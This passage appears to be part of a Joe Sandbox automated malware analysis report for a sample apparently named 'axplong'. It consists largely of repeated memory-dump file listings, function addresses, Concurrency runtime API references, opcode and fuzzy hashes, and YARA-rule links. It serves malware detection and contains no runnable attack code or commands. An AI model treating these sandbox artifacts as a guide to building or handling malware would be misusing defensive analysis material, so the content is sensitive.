                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: 571f2998bfd4d32612b357282af868d3b72f7b201ac1ef079e2ac4b719ec59a4
                                                                                                                                                                                                                                                    • Instruction ID: 5a9555803d1b6f6650cf051ef8c63bc4ee28451282659446d19a2d545d1cd76a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571f2998bfd4d32612b357282af868d3b72f7b201ac1ef079e2ac4b719ec59a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951C172601A06AFEB25FF50D891BBAB7A7EF52310F14412DE90247391EB71AC41CF90
                                                                                                                                                                                                                                                    Function 006A4B45 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1707706676-0
                                                                                                                                                                                                                                                    • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                                    • Instruction ID: 999100c67b07aafd4839f4f89801e8cd0d67d11eaf2571570e2e1fae85eaba22
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C051AC359052099FCF10EF68C8806EEFBF6EF96324F14449AD846A7351DBB2AD058F60
                                                                                                                                                                                                                                                    Function 0069DA60 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0069DA94
                                                                                                                                                                                                                                                      • Part of subcall function 00698E5F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00698E80
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0069DAF3
                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0069DB19
                                                                                                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0069DB86
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1091748018-0
                                                                                                                                                                                                                                                    • Opcode ID: 6a20956c4fe160d2f09df2b0c6e3eebca197ad535c0ca2314aa8319594978f67
                                                                                                                                                                                                                                                    • Instruction ID: e0e74727ec1d8bc89100c4742f2932d15b19020d8264d750dec83303248a3e15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a20956c4fe160d2f09df2b0c6e3eebca197ad535c0ca2314aa8319594978f67
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 114125B5600210ABCF15EB24C886BBDBB7FAF85720F0540ADE4069B786CF749D45C791
                                                                                                                                                                                                                                                    Function 006955DF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 00695622
                                                                                                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 00695656
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 006956BB
                                                                                                                                                                                                                                                    • SafeRWList.LIBCONCRT ref: 006956CA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 893951542-0
                                                                                                                                                                                                                                                    • Opcode ID: 2c638f559fcbd4c6e084342f31bc265a7e7f0b8e4d01b7dd884b4898af24517e
                                                                                                                                                                                                                                                    • Instruction ID: 4656bc93f854be44b35bbec0c7d313949e3c7e076c473fee78a7c81b27e276be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c638f559fcbd4c6e084342f31bc265a7e7f0b8e4d01b7dd884b4898af24517e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F31E3327016109FEF15AF24C881EAD77ABAF89710F194279D90A9B3A5DF30AD058790
                                                                                                                                                                                                                                                    Function 00692C2C Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00692C3F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
